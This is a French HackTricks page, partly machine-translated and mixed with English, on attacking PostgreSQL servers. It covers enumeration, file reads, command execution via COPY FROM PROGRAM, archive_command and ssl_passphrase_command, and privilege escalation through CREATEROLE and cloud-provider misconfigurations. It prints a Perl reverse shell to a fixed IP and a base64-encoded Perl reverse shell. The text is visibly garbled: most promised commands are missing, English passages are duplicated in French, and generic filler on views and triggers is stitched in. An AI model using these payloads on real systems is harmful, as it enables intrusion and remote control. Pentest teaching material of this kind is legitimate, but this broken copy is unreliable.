Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire facilement et **automatiser des flux de travail** alimentés par les outils communautaires les plus avancés au monde.\
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
**Port par défaut :** 5432, et si ce port est déjà utilisé, il semble que PostgreSQL utilisera le port suivant (probablement 5433) qui n'est pas utilisé.
Pour effectuer une énumération de base sur un serveur PostgreSQL, vous devez d'abord vous connecter au serveur à l'aide d'un client PostgreSQL. Vous pouvez utiliser des outils tels que `psql` ou `pgAdmin` pour vous connecter.
### Connexion à l'aide de `psql`
Pour vous connecter à un serveur PostgreSQL à l'aide de `psql`, utilisez la commande suivante :
Remplacez `<adresse_IP_serveur>` par l'adresse IP du serveur PostgreSQL, `<port>` par le numéro de port sur lequel le serveur écoute (par défaut : 5432), `<nom_utilisateur>` par le nom d'utilisateur et `<nom_base_de_données>` par le nom de la base de données à laquelle vous souhaitez vous connecter.
4. Dans l'onglet "Connexion", saisissez les informations de connexion, telles que l'adresse IP du serveur, le numéro de port, le nom d'utilisateur et le mot de passe.
5. Cliquez sur "Enregistrer" pour ajouter le serveur.
6. Double-cliquez sur le serveur pour vous connecter.
Une fois connecté au serveur PostgreSQL, vous pouvez commencer à effectuer une énumération de base en utilisant des requêtes SQL pour récupérer des informations sur les bases de données, les tables, les colonnes, etc.
Si vous exécutez **`\list`** et que vous trouvez une base de données appelée **`rdsadmin`**, vous saurez que vous êtes à l'intérieur d'une base de données **PostgreSQL AWS**.
Selon [**cette recherche**](https://www.exploit-db.com/papers/13084), lorsqu'une tentative de connexion échoue, `dblink` lance une exception `sqlclient_unable_to_establish_sqlconnection` incluant une explication de l'erreur. Des exemples de ces détails sont énumérés ci-dessous.
`DÉTAILS : impossible de se connecter au serveur : Aucun chemin d'accès vers l'hôte. Le serveur fonctionne-t-il sur l'hôte "1.2.3.4" et accepte-t-il les connexions TCP/IP sur le port 5678 ?`
PostgreSQL is an open-source relational database management system (RDBMS) that is widely used in web applications. As a pentester, it is important to understand how to assess the security of PostgreSQL installations and identify potential vulnerabilities.
PostgreSQL does not have default credentials, but it is common for users to set weak or easily guessable passwords. Therefore, it is important to test for weak credentials during a penetration test.
PostgreSQL is vulnerable to SQL injection attacks if user input is not properly sanitized. By injecting malicious SQL code, an attacker can manipulate the database and potentially gain unauthorized access.
If a user has been granted excessive privileges in a PostgreSQL database, it may be possible to escalate their privileges and gain unauthorized access to sensitive data or perform unauthorized actions.
## Post-Exploitation
### Dumping Data
To dump the contents of a PostgreSQL database, you can use the following command:
After gaining unauthorized access to a PostgreSQL database, an attacker may want to create a backdoor to maintain access in the future. This can be done by creating a new user with administrative privileges or by modifying existing user privileges.
Pentesting PostgreSQL involves identifying vulnerabilities in the database and exploiting them to gain unauthorized access or perform unauthorized actions. By understanding the enumeration, exploitation, and post-exploitation techniques, you can effectively assess the security of PostgreSQL installations.
Malheureusement, il ne semble pas y avoir de moyen d'obtenir les détails de l'exception dans une fonction PL/pgSQL. Mais vous pouvez obtenir les détails si vous pouvez vous connecter directement au serveur PostgreSQL. S'il n'est pas possible d'obtenir les noms d'utilisateur et les mots de passe directement à partir des tables système, l'attaque par liste de mots décrite dans la section précédente pourrait être couronnée de succès.
| rolreplication | Le rôle est un rôle de réplication. Un rôle de réplication peut initier des connexions de réplication et créer et supprimer des emplacements de réplication. |
| rolconnlimit | Pour les rôles pouvant se connecter, cela définit le nombre maximum de connexions simultanées que ce rôle peut établir. -1 signifie aucune limite. |
| rolpassword | Non le mot de passe (toujours affiché comme `********`) |
| rolvaliduntil | Heure d'expiration du mot de passe (utilisée uniquement pour l'authentification par mot de passe) ; null s'il n'y a pas d'expiration |
| rolbypassrls | Le rôle contourne toutes les stratégies de sécurité au niveau des lignes, voir [Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) pour plus d'informations. |
Notez que dans Postgres, un **utilisateur**, un **groupe** et un **rôle** sont les **mêmes**. Cela dépend simplement de **comment vous l'utilisez** et si vous **l'autorisez à se connecter**.
Les tables sont des objets de base de données qui stockent les données de manière organisée. Elles sont composées de colonnes et de lignes, où chaque colonne représente un attribut et chaque ligne représente un enregistrement.
Lors de la pentest d'une base de données PostgreSQL, il est important d'analyser les tables pour identifier les informations sensibles et les vulnérabilités potentielles. Voici quelques techniques couramment utilisées :
L'objectif de cette technique est de répertorier toutes les tables présentes dans la base de données. Cela peut être fait en utilisant des requêtes SQL spécifiques, telles que :
Une fois les tables identifiées, il est possible d'extraire les données qu'elles contiennent. Cela peut être fait en utilisant des requêtes SQL pour sélectionner les colonnes et les enregistrements souhaités. Par exemple :
Si une application web est connectée à la base de données PostgreSQL, il est possible d'exploiter des vulnérabilités d'injection SQL pour extraire des données ou effectuer des actions non autorisées. Cela peut être fait en manipulant les requêtes SQL de l'application pour exécuter du code malveillant. Par exemple :
Il est important de vérifier les privilèges accordés aux utilisateurs de la base de données. Cela permet de détecter les utilisateurs ayant des privilèges excessifs ou des privilèges insuffisants. Les requêtes SQL suivantes peuvent être utilisées pour cette analyse :
Il est recommandé de rechercher des vulnérabilités connues dans la version spécifique de PostgreSQL utilisée. Cela peut être fait en utilisant des outils d'analyse de vulnérabilités ou en consultant les bases de données de vulnérabilités publiques.
En résumé, l'analyse des tables dans une base de données PostgreSQL lors d'une pentest permet d'identifier les informations sensibles, d'extraire des données, d'exploiter des vulnérabilités d'injection SQL, d'analyser les privilèges et de rechercher des vulnérabilités connues. Ces techniques aident à évaluer la sécurité de la base de données et à recommander des mesures correctives si nécessaire.
Functions in PostgreSQL are named blocks of code that can be executed by calling their name. They are used to perform specific tasks and can accept parameters and return values. Functions can be created using the `CREATE FUNCTION` statement and can be written in various programming languages such as SQL, PL/pgSQL, Python, etc.
Les fonctions dans PostgreSQL sont des blocs de code nommés qui peuvent être exécutés en appelant leur nom. Elles sont utilisées pour effectuer des tâches spécifiques et peuvent accepter des paramètres et renvoyer des valeurs. Les fonctions peuvent être créées à l'aide de l'instruction `CREATE FUNCTION` et peuvent être écrites dans différents langages de programmation tels que SQL, PL/pgSQL, Python, etc.
Stored procedures are similar to functions, but they do not return a value. They are used to perform a series of actions or operations on the database. Stored procedures can be created using the `CREATE PROCEDURE` statement and can also be written in various programming languages.
Les procédures stockées sont similaires aux fonctions, mais elles ne renvoient pas de valeur. Elles sont utilisées pour effectuer une série d'actions ou d'opérations sur la base de données. Les procédures stockées peuvent être créées à l'aide de l'instruction `CREATE PROCEDURE` et peuvent également être écrites dans différents langages de programmation.
Triggers are special types of functions that are automatically executed when a specific event occurs in the database. They can be used to enforce data integrity, perform additional actions, or automate certain tasks. Triggers can be created using the `CREATE TRIGGER` statement and can be written in various programming languages.
Les déclencheurs sont des types spéciaux de fonctions qui sont automatiquement exécutées lorsqu'un événement spécifique se produit dans la base de données. Ils peuvent être utilisés pour garantir l'intégrité des données, effectuer des actions supplémentaires ou automatiser certaines tâches. Les déclencheurs peuvent être créés à l'aide de l'instruction `CREATE TRIGGER` et peuvent être écrits dans différents langages de programmation.
Views are virtual tables that are based on the result of a query. They provide an alternative way to access and manipulate data stored in tables. Views can be created using the `CREATE VIEW` statement and can be used to simplify complex queries, restrict access to certain columns, or provide a customized view of the data.
Les vues sont des tables virtuelles basées sur le résultat d'une requête. Elles fournissent une alternative pour accéder et manipuler les données stockées dans les tables. Les vues peuvent être créées à l'aide de l'instruction `CREATE VIEW` et peuvent être utilisées pour simplifier les requêtes complexes, restreindre l'accès à certaines colonnes ou fournir une vue personnalisée des données.
À partir de ce [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a), les membres du groupe **`DEFAULT_ROLE_READ_SERVER_FILES`** (appelé **`pg_read_server_files`**) et les **super utilisateurs** peuvent utiliser la méthode **`COPY`** sur n'importe quel chemin (consultez `convert_and_check_filename` dans `genfile.c`):
N'oubliez pas que si vous n'êtes pas un super utilisateur mais que vous avez les permissions **CREATEROLE**, vous pouvez **vous ajouter en tant que membre de ce groupe** :
Il existe **d'autres fonctions postgres** qui peuvent être utilisées pour **lire un fichier ou lister un répertoire**. Seuls les **superutilisateurs** et les **utilisateurs disposant de permissions explicites** peuvent les utiliser :
Vous pouvez trouver **plus de fonctions** dans [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html)
N'oubliez pas que si vous n'êtes pas un super utilisateur mais que vous avez les permissions **`CREATEROLE`**, vous pouvez **vous ajouter en tant que membre de ce groupe :**
N'oubliez pas que COPY ne peut pas gérer les caractères de saut de ligne, donc même si vous utilisez une charge utile en base64, **vous devez envoyer une seule ligne**.\
Une limitation très importante de cette technique est que **`copy` ne peut pas être utilisé pour écrire des fichiers binaires car il modifie certaines valeurs binaires**.
**Astuce pour les primes de bug** : **inscrivez-vous** sur **Intigriti**, une plateforme premium de **primes de bug créée par des hackers, pour des hackers** ! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) dès aujourd'hui et commencez à gagner des primes allant jusqu'à **100 000 $** !
Depuis la [version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), seuls les **super utilisateurs** et les membres du groupe **`pg_execute_server_program`** peuvent utiliser copy pour RCE (exemple avec exfiltration :
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
N'oubliez pas que si vous n'êtes pas un super utilisateur mais que vous avez les permissions **`CREATEROLE`**, vous pouvez **vous ajouter en tant que membre de ce groupe :**
Ou utilisez le module `multi/postgres/postgres_copy_from_program_cmd_exec` de **metasploit**.\
Plus d'informations sur cette vulnérabilité [**ici**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Bien que signalée comme CVE-2019-9193, Postges a déclaré qu'il s'agissait d'une [fonctionnalité et ne sera pas corrigée](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
Une fois que vous avez **appris** du précédent article **comment télécharger des fichiers binaires**, vous pouvez essayer d'obtenir **RCE en téléchargeant une extension PostgreSQL et en la chargeant**.
Le **fichier de configuration** de PostgreSQL est **modifiable** par l'utilisateur **postgres** qui exécute la base de données, donc en tant que **superutilisateur**, vous pouvez écrire des fichiers dans le système de fichiers, et donc vous pouvez **le remplacer**.
*`ssl_passphrase_command = ''` Si le fichier privé est protégé par un mot de passe (crypté), PostgreSQL **exécutera la commande indiquée dans cet attribut**.
*`ssl_passphrase_command_supports_reload = off`**Si** cet attribut est **activé**, la **commande** exécutée si la clé est protégée par un mot de passe **sera exécutée** lorsque `pg_reload_conf()` est **exécuté**.
Lors des tests, j'ai remarqué que cela ne fonctionnera que si le **fichier de clé privée a les privilèges 640**, il est **possédé par root** et par le **groupe ssl-cert ou postgres** (afin que l'utilisateur postgres puisse le lire), et est placé dans _/var/lib/postgresql/12/main_.
Pour que cela fonctionne, le paramètre `archive_mode` doit être `'on'` ou `'always'`. Si c'est le cas, nous pouvons remplacer la commande dans `archive_command` et la forcer à s'exécuter via les opérations WAL (write-ahead logging).
1. Vérifier si le mode archive est activé : `SELECT current_setting('archive_mode')`
2. Remplacer `archive_command` par la charge utile. Par exemple, un shell inversé : `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
3. Recharger la configuration : `SELECT pg_reload_conf()`
4. Forcer l'exécution de l'opération WAL, ce qui appellera la commande d'archivage : `SELECT pg_switch_wal()` ou `SELECT pg_switch_xlog()` pour certaines versions de Postgres
**Plus** [**d'informations sur cette configuration et sur WAL ici**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
Selon la [**documentation**](https://www.postgresql.org/docs/13/sql-grant.html) : _Les rôles ayant le privilège **`CREATEROLE`** peuvent **accorder ou révoquer l'appartenance à n'importe quel rôle** qui n'est pas un **superutilisateur**._
Donc, si vous avez la permission **`CREATEROLE`**, vous pouvez vous accorder l'accès à d'autres **rôles** (qui ne sont pas superutilisateurs) qui peuvent vous donner la possibilité de lire et d'écrire des fichiers et d'exécuter des commandes :
Il est assez courant de constater que **les utilisateurs locaux peuvent se connecter à PostgreSQL sans fournir de mot de passe**. Par conséquent, une fois que vous avez obtenu **les autorisations pour exécuter du code**, vous pouvez exploiter ces autorisations pour obtenir le rôle de **`SUPERUSER`** :
Dans [ce **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities), il est expliqué comment il était possible de **privesc** dans Postgres GCP en abusant du privilège ALTER TABLE accordé à l'utilisateur.
Lorsque vous essayez de **donner la propriété d'une table à un autre utilisateur**, vous devriez obtenir une **erreur** qui l'empêche, mais apparemment GCP a donné cette **option à l'utilisateur postgres non-superutilisateur** dans GCP :
En associant cette idée au fait que lorsque les commandes **INSERT/UPDATE/ANALYZE** sont exécutées sur une **table avec une fonction d'index**, la **fonction** est **appelée** en tant que partie de la commande avec les **permissions du propriétaire de la table**. Il est possible de créer un index avec une fonction et de donner les permissions de propriétaire à un **superutilisateur** sur cette table, puis d'exécuter ANALYZE sur la table avec la fonction malveillante qui pourra exécuter des commandes car elle utilise les privilèges du propriétaire.
2. Insérez du contenu factice dans la table, afin que la fonction d'index ait quelque chose à traiter.
3. Créez une fonction d'index malveillante (avec notre charge utile d'exécution de code) sur la table.
4. ALTEREZ le propriétaire de la table en cloudsqladmin, le rôle superutilisateur de GCP utilisé uniquement par Cloud SQL pour maintenir et gérer la base de données.
5. ANALYSEZ la table, forçant le moteur PostgreSQL à passer en mode utilisateur du propriétaire de la table (cloudsqladmin) et à appeler la fonction d'index malveillante avec les autorisations de cloudsqladmin, ce qui permet d'exécuter notre commande shell à laquelle nous n'avions pas la permission d'exécuter auparavant.
Certaines instances de postgresql mal configurées peuvent autoriser la connexion de n'importe quel utilisateur local. Il est possible de se connecter localement depuis 127.0.0.1 en utilisant la fonction **`dblink`** :
Notez que pour que la requête précédente fonctionne, **la fonction `dblink` doit exister**. Si ce n'est pas le cas, vous pouvez essayer de la créer avec
Si vous avez le mot de passe d'un utilisateur disposant de privilèges supérieurs, mais que l'utilisateur n'est pas autorisé à se connecter depuis une adresse IP externe, vous pouvez utiliser la fonction suivante pour exécuter des requêtes en tant qu'utilisateur :
Dans [**cet article**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), des pentesteurs ont réussi à obtenir des privilèges élevés à l'intérieur d'une instance PostgreSQL fournie par IBM, car ils ont **trouvé cette fonction avec le drapeau SECURITY DEFINER** :
Comme [**expliqué dans la documentation**](https://www.postgresql.org/docs/current/sql-createfunction.html), une fonction avec **SECURITY DEFINER est exécutée** avec les privilèges de l'**utilisateur qui la possède**. Par conséquent, si la fonction est **vulnérable à l'injection SQL** ou effectue des **actions privilégiées avec des paramètres contrôlés par l'attaquant**, elle peut être exploitée pour **escalader les privilèges à l'intérieur de PostgreSQL**.
PL/pgSQL, en tant que **langage de programmation complet**, permet un contrôle procédural beaucoup plus avancé que SQL, y compris la **possibilité d'utiliser des boucles et d'autres structures de contrôle**. Les instructions SQL et les déclencheurs peuvent appeler des fonctions créées dans le langage PL/pgSQL.\
**Vous pouvez abuser de ce langage pour demander à PostgreSQL de forcer les informations d'identification des utilisateurs.**
Vous pouvez les décrypter en utilisant la fonction _**decrypt**_ dans le script : [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
L'authentification du client est contrôlée par un fichier de configuration fréquemment appelé _**pg\_hba.conf**_. Ce fichier contient un ensemble d'enregistrements. Un enregistrement peut avoir l'un des sept formats suivants :
**Chaque** enregistrement **spécifie** un **type de connexion**, une **plage d'adresses IP client** (si cela est pertinent pour le type de connexion), un **nom de base de données**, un **nom d'utilisateur** et la **méthode d'authentification** à utiliser pour les connexions correspondant à ces paramètres. Le **premier enregistrement correspondant** avec un type de connexion, une adresse client, une base de données demandée et un nom d'utilisateur **est utilisé** pour effectuer l'authentification. Il n'y a pas de "passage" ou de "sauvegarde" : **si un enregistrement est choisi et que l'authentification échoue, les enregistrements suivants ne sont pas pris en compte**. Si aucun enregistrement ne correspond, l'accès est refusé.\
Les méthodes d'authentification basées sur le mot de passe sont **md5**, **crypt** et **password**. Ces méthodes fonctionnent de manière similaire, à l'exception de la manière dont le mot de passe est envoyé via la connexion : respectivement, haché en MD5, crypté en crypt et en texte clair. Une limitation est que la méthode crypt ne fonctionne pas avec les mots de passe qui ont été cryptés dans pg\_authid.
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour créer et **automatiser facilement des flux de travail** alimentés par les outils communautaires les plus avancés au monde.\
